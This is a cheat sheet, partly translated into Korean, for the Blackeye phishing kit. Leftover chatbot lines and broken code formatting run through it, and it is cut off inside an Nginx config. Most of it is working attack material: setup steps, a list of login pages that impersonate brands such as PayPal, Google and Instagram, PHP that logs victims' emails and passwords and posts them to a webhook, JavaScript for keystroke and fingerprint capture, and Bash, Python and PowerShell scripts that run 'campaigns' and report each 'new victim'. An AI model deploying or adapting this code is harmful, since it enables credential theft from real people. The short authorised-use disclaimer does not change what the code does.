Blackeye 피싱 도구 치트 시트
Would you like me to continue with the translation of section 2 (Overview)? If so, here’s the translation:
개요
Blackeye는 thelinuxchoice에서 개발한 포괄적인 피싱 도구로, 인기 있는 웹사이트 및 서비스에 대한 32개 이상의 즉시 사용 가능한 피싱 템플릿을 제공합니다. 최소한의 설정으로 피싱 페이지를 빠르게 배포할 수 있도록 설계되었으며, 교육 목적 및 승인된 침투 테스트에 널리 사용됩니다. Blackeye는 자동 자격 증명 수집, 실시간 모니터링, 다양한 터널링 서비스를 지원합니다.
⚠️ 경고: 이 도구는 승인된 침투 테스트 및 교육 목적으로만 사용됩니다. 대상에 대해 사용하기 전에 적절한 승인을 받았는지 확인하세요.
Would you like me to proceed with the remaining sections or provide the full text for those sections?```bash
Install required packages
sudo apt update sudo apt install -y git curl php apache2
Install additional dependencies
sudo apt install -y openssh-server unzip wget
Verify PHP installation
php —version
Start Apache service
sudo systemctl start apache2 sudo systemctl enable apache2
### Installation from GitHub
```bash
# Clone Blackeye repository
git clone https://github.com/thelinuxchoice/blackeye.git
cd blackeye
# Make executable
chmod +x blackeye.sh
# Run Blackeye
./blackeye.shManual Installation
# Download latest version
wget https://github.com/thelinuxchoice/blackeye/archive/master.zip
unzip master.zip
cd blackeye-master
# Set permissions
chmod +x blackeye.sh
# Install dependencies
sudo apt install -y php-cli php-curl php-jsonDocker Installation
# Create Dockerfile
cat > Dockerfile << 'EOF'
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y \
git \
php \
curl \
apache2 \
openssh-server \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /app
RUN git clone https://github.com/thelinuxchoice/blackeye.git .
RUN chmod +x blackeye.sh
EXPOSE 80 8080
CMD ["./blackeye.sh"]
EOF
# Build and run
docker build -t blackeye .
docker run -it --rm -p 80:80 -p 8080:8080 blackeyeBasic Usage
Starting Blackeye
# Start Blackeye with default settings
./blackeye.sh
# Start with specific port
PORT=8080 ./blackeye.sh
# Start with custom domain
DOMAIN=phishing.example.com ./blackeye.sh
# Start in background mode
nohup ./blackeye.sh &Interactive Menu Navigation
# Blackeye main menu options:
# 1) Instagram
# 2) Facebook
# 3) Snapchat
# 4) Twitter
# 5) GitHub
# 6) Google
# 7) Origin
# 8) Yahoo
# 9) LinkedIn
# 10) ProtonMail
# 11) Wordpress
# 12) Microsoft
# 13) Netflix
# 14) PayPal
# 15) Adobe ID
# 16) Shopify
# 17) Messenger
# 18) GitLab
# 19) Twitch
# 20) MySpace
# 21) Badoo
# 22) VK
# 23) Yandex
# 24) deviantART
# 25) Wi-Fi
# 26) DropBox
# 27) eBay
# 28) Amazon
# 29) iCloud
# 30) Spotify
# 31) Reddit
# 32) Adobe
# 33) Custom
# 99) Exit
# Select template by number
# Example: Select 1 for InstagramTunneling Options
# Blackeye tunneling menu:
# 1) Localhost (Default)
# 2) Ngrok
# 3) Cloudflared
# 4) LocalXpose
# Ngrok setup
# Download and install ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
sudo mv ngrok /usr/local/bin/
# Authenticate ngrok (requires account)
ngrok authtoken YOUR_NGROK_TOKEN
# Cloudflared setup
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
sudo dpkg -i cloudflared-linux-amd64.debAvailable Templates
Social Media Platforms
# Instagram (Template 1)
# - Login page replica
# - Mobile-responsive design
# - Credential harvesting
# - Session capture
# Facebook (Template 2)
# - Classic Facebook login
# - Mobile and desktop versions
# - Multi-language support
# - Real-time monitoring
# Snapchat (Template 3)
# - Snapchat login interface
# - Mobile-optimized
# - Ghost icon branding
# - Quick deployment
# Twitter (Template 4)
# - Twitter login page
# - Blue verification theme
# - Character limit simulation
# - Tweet-like interface
# LinkedIn (Template 9)
# - Professional network theme
# - Business-focused design
# - Career-oriented content
# - Professional brandingEmail and Cloud Services
# Google (Template 6)
# - Google account login
# - Gmail integration
# - Google services branding
# - Multi-factor auth simulation
# Yahoo (Template 8)
# - Yahoo Mail login
# - Classic Yahoo design
# - Email-focused interface
# - News integration
# ProtonMail (Template 10)
# - Secure email branding
# - Privacy-focused design
# - Encryption messaging
# - Security-conscious users
# Microsoft (Template 12)
# - Office 365 login
# - Outlook integration
# - Business productivity theme
# - Enterprise branding
# iCloud (Template 29)
# - Apple iCloud login
# - iOS design elements
# - Apple branding
# - Device synchronization themeProfessional and Development
# GitHub (Template 5)
# - Developer-focused design
# - Code repository theme
# - Git integration appearance
# - Open source branding
# GitLab (Template 18)
# - DevOps platform design
# - CI/CD pipeline theme
# - Enterprise development
# - Version control focus
# Adobe ID (Template 15)
# - Creative Cloud branding
# - Designer-focused interface
# - Subscription model theme
# - Creative professional targeting
# Wordpress (Template 11)
# - Content management theme
# - Blogger-focused design
# - Publishing platform
# - Website creation focusEntertainment and Gaming
# Netflix (Template 13)
# - Streaming service design
# - Entertainment branding
# - Subscription interface
# - Movie/TV show theme
# Spotify (Template 30)
# - Music streaming design
# - Audio-focused branding
# - Playlist interface
# - Music discovery theme
# Twitch (Template 19)
# - Gaming platform design
# - Streaming interface
# - Gamer-focused branding
# - Live content theme
# Origin (Template 7)
# - Gaming platform
# - EA Games branding
# - Game library interface
# - Digital distributionE-commerce and Financial
# PayPal (Template 14)
# - Financial service design
# - Payment processing theme
# - Security-focused branding
# - Transaction interface
# Amazon (Template 28)
# - E-commerce platform
# - Shopping interface
# - Product catalog design
# - Marketplace branding
# eBay (Template 27)
# - Auction platform design
# - Bidding interface
# - Seller/buyer theme
# - Marketplace focus
# Shopify (Template 16)
# - E-commerce creation
# - Store management theme
# - Business-focused design
# - Merchant targetingCustom Template Creation
Template Structure
# Blackeye template directory structure
templates/
├── custom/
│ ├── index.html
│ ├── login.php
│ ├── style.css
│ ├── script.js
│ └── images/
│ ├── logo.png
│ └── background.jpgCustom HTML Template
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Custom Platform - Sign In</title>
<link rel="stylesheet" href="style.css">
<link rel="icon" href="images/favicon.ico">
</head>
<body>
<div class="container">
<div class="login-box">
<div class="logo">
<img src="images/logo.png" alt="Custom Platform">
</div>
<h2>Sign in to your account</h2>
<form action="login.php" method="POST" id="loginForm">
<div class="input-group">
<label for="email">Email or Username</label>
<input type="text" id="email" name="email" required>
</div>
<div class="input-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
</div>
<div class="checkbox-group">
<input type="checkbox" id="remember" name="remember">
<label for="remember">Remember me</label>
</div>
<button type="submit" class="login-btn">Sign In</button>
</form>
<div class="links">
<a href="#" onclick="collectAdditionalInfo()">Forgot password?</a>
<a href="#" onclick="collectAdditionalInfo()">Create account</a>
</div>
</div>
</div>
<script src="script.js"></script>
</body>
</html>PHP Backend Script
<?php
// templates/custom/login.php
// Start session
session_start();
// Get user information
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$timestamp = date('Y-m-d H:i:s');
// Get form data
$email = $_POST['email'] ?? '';
$password = $_POST['password'] ?? '';
$remember = $_POST['remember'] ?? '';
// Additional information collection
$browser_info = [
'user_agent' => $user_agent,
'ip_address' => $ip,
'timestamp' => $timestamp,
'referer' => $_SERVER['HTTP_REFERER'] ?? '',
'accept_language' => $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '',
'accept_encoding' => $_SERVER['HTTP_ACCEPT_ENCODING'] ?? ''
];
// Prepare data for logging
$captured_data = [
'credentials' => [
'email' => $email,
'password' => $password,
'remember' => $remember
],
'browser_info' => $browser_info,
'additional_data' => [
'screen_resolution' => $_POST['screen_resolution'] ?? '',
'timezone' => $_POST['timezone'] ?? '',
'plugins' => $_POST['plugins'] ?? ''
]
];
// Log to file
$log_file = 'captured_data.txt';
$log_entry = date('Y-m-d H:i:s') . " - " . $ip . " - " . $email . " - " . $password . "\n";
file_put_contents($log_file, $log_entry, FILE_APPEND|LOCK_EX);
// Log detailed JSON data
$json_file = 'captured_data.json';
$json_data = json_encode($captured_data, JSON_PRETTY_PRINT) . "\n";
file_put_contents($json_file, $json_data, FILE_APPEND|LOCK_EX);
// Send notification (optional)
if (function_exists('curl_init')) \\\\{
$webhook_url = 'https://your-webhook-url.com/notify';
$notification_data = [
'text' => "New Blackeye capture from $ip",
'data' => $captured_data
];
$ch = curl_init($webhook_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($notification_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
\\\\}
// Redirect to legitimate site
$redirect_url = 'https://legitimate-site.com';
header("Location: $redirect_url");
exit();
?>CSS Styling
/* templates/custom/style.css */
* \\\\{
margin: 0;
padding: 0;
box-sizing: border-box;
\\\\}
body \\\\{
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
\\\\}
.container \\\\{
width: 100%;
max-width: 400px;
padding: 20px;
\\\\}
.login-box \\\\{
background: white;
border-radius: 10px;
padding: 40px;
box-shadow: 0 15px 35px rgba(0, 0, 0, 0.1);
text-align: center;
\\\\}
.logo img \\\\{
width: 80px;
height: 80px;
margin-bottom: 20px;
\\\\}
h2 \\\\{
color: #333;
margin-bottom: 30px;
font-weight: 600;
\\\\}
.input-group \\\\{
margin-bottom: 20px;
text-align: left;
\\\\}
.input-group label \\\\{
display: block;
margin-bottom: 5px;
color: #555;
font-weight: 500;
\\\\}
.input-group input \\\\{
width: 100%;
padding: 12px;
border: 2px solid #e1e5e9;
border-radius: 6px;
font-size: 16px;
transition: border-color 0.3s;
\\\\}
.input-group input:focus \\\\{
outline: none;
border-color: #667eea;
\\\\}
.checkbox-group \\\\{
display: flex;
align-items: center;
margin-bottom: 20px;
text-align: left;
\\\\}
.checkbox-group input \\\\{
margin-right: 8px;
\\\\}
.login-btn \\\\{
width: 100%;
padding: 12px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
border: none;
border-radius: 6px;
font-size: 16px;
font-weight: 600;
cursor: pointer;
transition: transform 0.2s;
\\\\}
.login-btn:hover \\\\{
transform: translateY(-2px);
\\\\}
.links \\\\{
margin-top: 20px;
display: flex;
justify-content: space-between;
\\\\}
.links a \\\\{
color: #667eea;
text-decoration: none;
font-size: 14px;
\\\\}
.links a:hover \\\\{
text-decoration: underline;
\\\\}
/* Mobile responsiveness */
@media (max-width: 480px) \\\\{
.container \\\\{
padding: 10px;
\\\\}
.login-box \\\\{
padding: 30px 20px;
\\\\}
.links \\\\{
flex-direction: column;
gap: 10px;
\\\\}
\\\\}JavaScript Enhancement
// templates/custom/script.js
// Collect additional browser information
function collectBrowserInfo() \\\\{
const info = \\\\{
screen_resolution: screen.width + 'x' + screen.height,
timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
language: navigator.language,
platform: navigator.platform,
cookie_enabled: navigator.cookieEnabled,
online: navigator.onLine,
plugins: Array.from(navigator.plugins).map(p => p.name).join(', ')
\\\\};
// Add hidden inputs to form
const form = document.getElementById('loginForm');
Object.keys(info).forEach(key => \\\\{
const input = document.createElement('input');
input.type = 'hidden';
input.name = key;
input.value = info[key];
form.appendChild(input);
\\\\});
\\\\}
// Collect additional information on link clicks
function collectAdditionalInfo() \\\\{
const additionalInfo = \\\\{
timestamp: new Date().toISOString(),
page_url: window.location.href,
referrer: document.referrer,
viewport: window.innerWidth + 'x' + window.innerHeight
\\\\};
// Send to server
fetch('collect_info.php', \\\\{
method: 'POST',
headers: \\\\{
'Content-Type': 'application/json',
\\\\},
body: JSON.stringify(additionalInfo)
\\\\}).catch(err => console.log('Info collection failed'));
\\\\}
// Form validation and enhancement
document.addEventListener('DOMContentLoaded', function() \\\\{
collectBrowserInfo();
const form = document.getElementById('loginForm');
const emailInput = document.getElementById('email');
const passwordInput = document.getElementById('password');
// Real-time validation
emailInput.addEventListener('input', function() \\\\{
const email = this.value;
if (email.includes('@')) \\\\{
this.style.borderColor = '#28a745';
\\\\} else \\\\{
this.style.borderColor = '#e1e5e9';
\\\\}
\\\\});
passwordInput.addEventListener('input', function() \\\\{
const password = this.value;
if (password.length >= 6) \\\\{
this.style.borderColor = '#28a745';
\\\\} else \\\\{
this.style.borderColor = '#e1e5e9';
\\\\}
\\\\});
// Form submission tracking
form.addEventListener('submit', function(e) \\\\{
// Track submission attempt
const submissionData = \\\\{
timestamp: new Date().toISOString(),
email_length: emailInput.value.length,
password_length: passwordInput.value.length,
time_on_page: Date.now() - window.performance.timing.navigationStart
\\\\};
// Add to form
Object.keys(submissionData).forEach(key => \\\\{
const input = document.createElement('input');
input.type = 'hidden';
input.name = key;
input.value = submissionData[key];
form.appendChild(input);
\\\\});
\\\\});
\\\\});
// Mouse movement tracking (optional)
let mouseMovements = [];
document.addEventListener('mousemove', function(e) \\\\{
mouseMovements.push(\\\\{
x: e.clientX,
y: e.clientY,
timestamp: Date.now()
\\\\});
// Keep only last 50 movements
if (mouseMovements.length > 50) \\\\{
mouseMovements = mouseMovements.slice(-50);
\\\\}
\\\\});
// Keystroke timing (optional)
let keystrokeTimings = [];
document.addEventListener('keydown', function(e) \\\\{
keystrokeTimings.push(\\\\{
key: e.key,
timestamp: Date.now(),
target: e.target.name||e.target.id
\\\\});
\\\\});Automation and Scripting
Bash Automation Script
#!/bin/bash
# Blackeye automation script
BLACKEYE_DIR="/path/to/blackeye"
TEMPLATE_NUMBER="1" # Instagram
TUNNEL_OPTION="2" # Ngrok
DURATION="3600" # 1 hour
# Function to start Blackeye
start_blackeye() \\\\{
echo "[+] Starting Blackeye automation..."
cd "$BLACKEYE_DIR"
# Create expect script for automation
cat > blackeye_auto.exp << 'EOF'
#!/usr/bin/expect -f
set timeout 30
set template [lindex $argv 0]
set tunnel [lindex $argv 1]
spawn ./blackeye.sh
# Select template
expect "Choose an option:"
send "$template\r"
# Select tunneling option
expect "Choose an option:"
send "$tunnel\r"
# Wait for setup completion
expect "Press Ctrl+C to stop"
# Keep running
interact
EOF
chmod +x blackeye_auto.exp
# Run automated setup
./blackeye_auto.exp "$TEMPLATE_NUMBER" "$TUNNEL_OPTION" &
BLACKEYE_PID=$!
echo "[+] Blackeye started with PID: $BLACKEYE_PID"
echo "[+] Template: $TEMPLATE_NUMBER, Tunnel: $TUNNEL_OPTION"
\\\\}
# Function to monitor captures
monitor_captures() \\\\{
echo "[+] Starting capture monitoring..."
while true; do
if [ -f "captured_data.txt" ]; then
CAPTURE_COUNT=$(wc -l < captured_data.txt)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Export latest captures
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
cp captured_data.txt "captures_backup_$TIMESTAMP.txt"
if [ -f "captured_data.json" ]; then
cp captured_data.json "captures_detailed_$TIMESTAMP.json"
fi
echo "[+] Captures backed up with timestamp: $TIMESTAMP"
fi
fi
sleep 30
done
\\\\}
# Function to send notifications
send_notification() \\\\{
local message="$1"
local webhook_url="https://your-webhook-url.com/notify"
if command -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"$message\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\\\}
# Function to cleanup
cleanup() \\\\{
echo "[+] Cleaning up..."
if [ -n "$BLACKEYE_PID" ]; then
kill "$BLACKEYE_PID" 2>/dev/null
echo "[+] Blackeye stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Monitoring stopped"
fi
# Final backup
if [ -f "captured_data.txt" ]; then
FINAL_TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
cp captured_data.txt "final_captures_$FINAL_TIMESTAMP.txt"
echo "[+] Final backup created: final_captures_$FINAL_TIMESTAMP.txt"
fi
exit 0
\\\\}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() \\\\{
echo "[+] Blackeye Automation Script"
echo "[+] Template: $TEMPLATE_NUMBER"
echo "[+] Tunnel: $TUNNEL_OPTION"
echo "[+] Duration: $DURATION seconds"
# Check dependencies
if ! command -v expect &> /dev/null; then
echo "[-] expect is required. Install with: sudo apt install expect"
exit 1
fi
# Start Blackeye
start_blackeye
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Send start notification
send_notification "Blackeye automation started - Template: $TEMPLATE_NUMBER"
# Run for specified duration
echo "[+] Running for $DURATION seconds..."
sleep "$DURATION"
# Send completion notification
send_notification "Blackeye automation completed"
cleanup
\\\\}
# Execute main function
mainPython Automation Script
#!/usr/bin/env python3
# Blackeye Python automation script
import subprocess
import time
import json
import os
import requests
import threading
from datetime import datetime
class BlackeyeAutomation:
def __init__(self, blackeye_dir, template_number=1, tunnel_option=2):
self.blackeye_dir = blackeye_dir
self.template_number = template_number
self.tunnel_option = tunnel_option
self.process = None
self.monitoring = False
self.webhook_url = "https://your-webhook-url.com/notify"
def start_blackeye(self):
"""Start Blackeye with automated input"""
try:
os.chdir(self.blackeye_dir)
# Create expect script for automation
expect_script = f"""#!/usr/bin/expect -f
set timeout 30
spawn ./blackeye.sh
expect "Choose an option:"
send "\\\\{self.template_number\\\\}\\r"
expect "Choose an option:"
send "\\\\{self.tunnel_option\\\\}\\r"
expect "Press Ctrl+C to stop"
interact
"""
with open('blackeye_auto.exp', 'w') as f:
f.write(expect_script)
os.chmod('blackeye_auto.exp', 0o755)
# Start Blackeye
self.process = subprocess.Popen(['./blackeye_auto.exp'])
print(f"[+] Blackeye started with PID: \\\\{self.process.pid\\\\}")
print(f"[+] Template: \\\\{self.template_number\\\\}, Tunnel: \\\\{self.tunnel_option\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Blackeye: \\\\{e\\\\}")
return False
def monitor_captures(self):
"""Monitor captured data files"""
self.monitoring = True
last_count = 0
print("[+] Starting capture monitoring...")
while self.monitoring:
try:
if os.path.exists('captured_data.txt'):
with open('captured_data.txt', 'r') as f:
lines = f.readlines()
current_count = len(lines)
if current_count > last_count:
new_captures = current_count - last_count
print(f"[+] \\\\{new_captures\\\\} new capture(s) detected")
# Process new captures
for i in range(last_count, current_count):
if i < len(lines):
self.process_capture(lines[i].strip())
last_count = current_count
# Backup captures
self.backup_captures()
time.sleep(10)
except Exception as e:
print(f"[-] Monitoring error: \\\\{e\\\\}")
time.sleep(30)
def process_capture(self, capture_line):
"""Process individual capture"""
try:
# Parse capture line (format: timestamp - ip - email - password)
parts = capture_line.split(' - ')
if len(parts) >= 4:
timestamp, ip, email, password = parts[:4]
print(f"[+] New victim: \\\\{ip\\\\}")
print(f" Email: \\\\{email\\\\}")
print(f" Password: \\\\{'*' * len(password)\\\\}")
print(f" Time: \\\\{timestamp\\\\}")
# Send notification
self.send_notification(\\\\{
'timestamp': timestamp,
'ip': ip,
'email': email,
'password_length': len(password)
\\\\})
except Exception as e:
print(f"[-] Error processing capture: \\\\{e\\\\}")
def backup_captures(self):
"""Backup captured data"""
try:
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
# Backup text file
if os.path.exists('captured_data.txt'):
backup_file = f"captures_backup_\\\\{timestamp\\\\}.txt"
subprocess.run(['cp', 'captured_data.txt', backup_file])
print(f"[+] Text backup created: \\\\{backup_file\\\\}")
# Backup JSON file
if os.path.exists('captured_data.json'):
backup_file = f"captures_detailed_\\\\{timestamp\\\\}.json"
subprocess.run(['cp', 'captured_data.json', backup_file])
print(f"[+] JSON backup created: \\\\{backup_file\\\\}")
except Exception as e:
print(f"[-] Backup error: \\\\{e\\\\}")
def send_notification(self, capture_data):
"""Send webhook notification"""
try:
payload = \\\\{
'text': f"🎣 New Blackeye Capture",
'capture': capture_data
\\\\}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def analyze_captures(self):
"""Analyze captured data"""
try:
if not os.path.exists('captured_data.json'):
print("[-] No JSON data file found")
return
with open('captured_data.json', 'r') as f:
data = [json.loads(line) for line in f if line.strip()]
if not data:
print("[-] No capture data found")
return
# Basic analysis
total_captures = len(data)
unique_ips = len(set(item['browser_info']['ip_address'] for item in data))
# Browser analysis
browsers = \\\\{\\\\}
for item in data:
ua = item['browser_info']['user_agent']
if 'Chrome' in ua:
browsers['Chrome'] = browsers.get('Chrome', 0) + 1
elif 'Firefox' in ua:
browsers['Firefox'] = browsers.get('Firefox', 0) + 1
elif 'Safari' in ua:
browsers['Safari'] = browsers.get('Safari', 0) + 1
else:
browsers['Other'] = browsers.get('Other', 0) + 1
# Generate report
report = \\\\{
'total_captures': total_captures,
'unique_ips': unique_ips,
'browser_distribution': browsers,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save report
with open('analysis_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Analysis complete:")
print(f" Total captures: \\\\{total_captures\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f" Browser distribution: \\\\{browsers\\\\}")
print(f"[+] Report saved to: analysis_report.json")
except Exception as e:
print(f"[-] Analysis error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1):
"""Run complete automated campaign"""
print("[+] Starting Blackeye automation campaign...")
# Start Blackeye
if not self.start_blackeye():
return False
# Start monitoring in background thread
monitor_thread = threading.Thread(target=self.monitor_captures)
monitor_thread.daemon = True
monitor_thread.start()
# Send start notification
self.send_notification(\\\\{
'message': 'Blackeye campaign started',
'template': self.template_number,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Final analysis
self.analyze_captures()
# Send completion notification
self.send_notification(\\\\{
'message': 'Blackeye campaign completed',
'template': self.template_number
\\\\})
# Cleanup
self.cleanup()
print("[+] Campaign completed successfully")
return True
def cleanup(self):
"""Cleanup processes and files"""
try:
if self.process and self.process.poll() is None:
self.process.terminate()
self.process.wait(timeout=10)
print("[+] Blackeye process terminated")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists('captured_data.txt'):
final_backup = f"final_captures_\\\\{timestamp\\\\}.txt"
subprocess.run(['cp', 'captured_data.txt', final_backup])
print(f"[+] Final backup created: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
# Usage example
def main():
# Configuration
blackeye_dir = "/path/to/blackeye"
template_number = 1 # Instagram
tunnel_option = 2 # Ngrok
duration_hours = 1
# Create automation instance
automation = BlackeyeAutomation(blackeye_dir, template_number, tunnel_option)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours)
if success:
print("[+] Automation completed successfully")
else:
print("[-] Automation failed")
if __name__ == "__main__":
main()
```### PowerShell 자동화
```powershell
# Blackeye PowerShell automation script
param(
[string]$BlackeyePath = "C:\Tools\blackeye",
[int]$TemplateNumber = 1,
[int]$TunnelOption = 2,
[int]$DurationMinutes = 60
)
function Start-BlackeyeAutomation \\\\{
param(
[string]$Path,
[int]$Template,
[int]$Tunnel
)
Write-Host "[+] Starting Blackeye automation..." -ForegroundColor Green
Set-Location $Path
# Create automation script
$automationScript = @"
#!/usr/bin/expect -f
set timeout 30
spawn ./blackeye.sh
expect "Choose an option:"
send "$Template\r"
expect "Choose an option:"
send "$Tunnel\r"
expect "Press Ctrl+C to stop"
interact
"@
$automationScript|Out-File -FilePath "blackeye_auto.exp" -Encoding ASCII
# Start process (requires WSL or Linux environment)
try \\\\{
$process = Start-Process -FilePath "bash" -ArgumentList @("blackeye_auto.exp") -PassThru
Write-Host "[+] Blackeye started with PID: $($process.Id)" -ForegroundColor Green
return $process
\\\\}
catch \\\\{
Write-Host "[-] Failed to start Blackeye: $_" -ForegroundColor Red
return $null
\\\\}
\\\\}
function Monitor-Captures \\\\{
param(
[string]$Path,
[int]$DurationMinutes
)
Write-Host "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCount = 0
while ((Get-Date) -lt $endTime) \\\\{
$captureFile = Join-Path $Path "captured_data.txt"
if (Test-Path $captureFile) \\\\{
$lines = Get-Content $captureFile
$currentCount = $lines.Count
if ($currentCount -gt $lastCount) \\\\{
$newCaptures = $currentCount - $lastCount
Write-Host "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# Process new captures
for ($i = $lastCount; $i -lt $currentCount; $i++) \\\\{
if ($i -lt $lines.Count) \\\\{
Process-Capture -CaptureData $lines[$i]
\\\\}
\\\\}
$lastCount = $currentCount
# Backup captures
Backup-Captures -Path $Path
\\\\}
\\\\}
Start-Sleep -Seconds 30
\\\\}
Write-Host "[+] Monitoring completed" -ForegroundColor Green
\\\\}
function Process-Capture \\\\{
param([string]$CaptureData)
try \\\\{
# Parse capture data (format: timestamp - ip - email - password)
$parts = $CaptureData -split ' - '
if ($parts.Count -ge 4) \\\\{
$timestamp = $parts[0]
$ip = $parts[1]
$email = $parts[2]
$password = $parts[3]
Write-Host "[+] New victim: $ip" -ForegroundColor Cyan
Write-Host " Email: $email" -ForegroundColor Cyan
Write-Host " Password: $('*' * $password.Length)" -ForegroundColor Cyan
Write-Host " Time: $timestamp" -ForegroundColor Cyan
# Send notification
Send-Notification -Data @\\\\{
timestamp = $timestamp
ip = $ip
email = $email
password_length = $password.Length
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Error processing capture: $_" -ForegroundColor Red
\\\\}
\\\\}
function Backup-Captures \\\\{
param([string]$Path)
try \\\\{
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
# Backup text file
$captureFile = Join-Path $Path "captured_data.txt"
if (Test-Path $captureFile) \\\\{
$backupFile = Join-Path $Path "captures_backup_$timestamp.txt"
Copy-Item $captureFile $backupFile
Write-Host "[+] Text backup created: $backupFile" -ForegroundColor Green
\\\\}
# Backup JSON file
$jsonFile = Join-Path $Path "captured_data.json"
if (Test-Path $jsonFile) \\\\{
$backupFile = Join-Path $Path "captures_detailed_$timestamp.json"
Copy-Item $jsonFile $backupFile
Write-Host "[+] JSON backup created: $backupFile" -ForegroundColor Green
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Backup error: $_" -ForegroundColor Red
\\\\}
\\\\}
function Send-Notification \\\\{
param([hashtable]$Data)
$webhookUrl = "https://your-webhook-url.com/notify"
$payload = @\\\\{
text = "🎣 New Blackeye Capture"
capture = $Data
\\\\}|ConvertTo-Json
try \\\\{
$response = Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
Write-Host "[+] Notification sent successfully" -ForegroundColor Green
\\\\}
catch \\\\{
Write-Host "[-] Notification failed: $_" -ForegroundColor Red
\\\\}
\\\\}
function Stop-BlackeyeProcess \\\\{
param([System.Diagnostics.Process]$Process)
if ($Process -and !$Process.HasExited) \\\\{
$Process.Kill()
Write-Host "[+] Blackeye process stopped" -ForegroundColor Green
\\\\}
\\\\}
# Main execution
try \\\\{
Write-Host "[+] Blackeye PowerShell Automation" -ForegroundColor Cyan
Write-Host "[+] Template: $TemplateNumber" -ForegroundColor Cyan
Write-Host "[+] Tunnel: $TunnelOption" -ForegroundColor Cyan
Write-Host "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start Blackeye
$blackeyeProcess = Start-BlackeyeAutomation -Path $BlackeyePath -Template $TemplateNumber -Tunnel $TunnelOption
if ($blackeyeProcess) \\\\{
# Monitor captures
Monitor-Captures -Path $BlackeyePath -DurationMinutes $DurationMinutes
# Stop process
Stop-BlackeyeProcess -Process $blackeyeProcess
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Script error: $_" -ForegroundColor Red
\\\\}
finally \\\\{
Write-Host "[+] Script completed" -ForegroundColor Green
\\\\}
```## 다른 도구와의 통합
### Ngrok 통합
```bash
# Setup ngrok for public access
# Download and install ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
sudo mv ngrok /usr/local/bin/
# Authenticate with ngrok
ngrok authtoken YOUR_NGROK_TOKEN
# Start ngrok tunnel
ngrok http 80
# Get public URL
curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url'
```### Apache/Nginx 통합
```bash
# Apache virtual host configuration
sudo tee /etc/apache2/sites-available/blackeye.conf << 'EOF'
<VirtualHost *:80>
ServerName phishing.example.com
DocumentRoot /path/to/blackeye/templates/selected
<Directory /path/to/blackeye/templates/selected>
AllowOverride All
Require all granted
</Directory>
ErrorLog $\\\\{APACHE_LOG_DIR\\\\}/blackeye_error.log
CustomLog $\\\\{APACHE_LOG_DIR\\\\}/blackeye_access.log combined
</VirtualHost>
EOF
# Enable site
sudo a2ensite blackeye.conf
sudo systemctl reload apache2
# Nginx configuration
sudo tee /etc/nginx/sites-available/blackeye << 'EOF'
server \\\\{
listen 80;
server_name phishing.example.com;
root /path/to/blackeye/templates/selected;
index index.html index.php;
location ~ \.php$ \\\\{
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
\\\\}
access_log /var/log/nginx/blackeye_access.log;
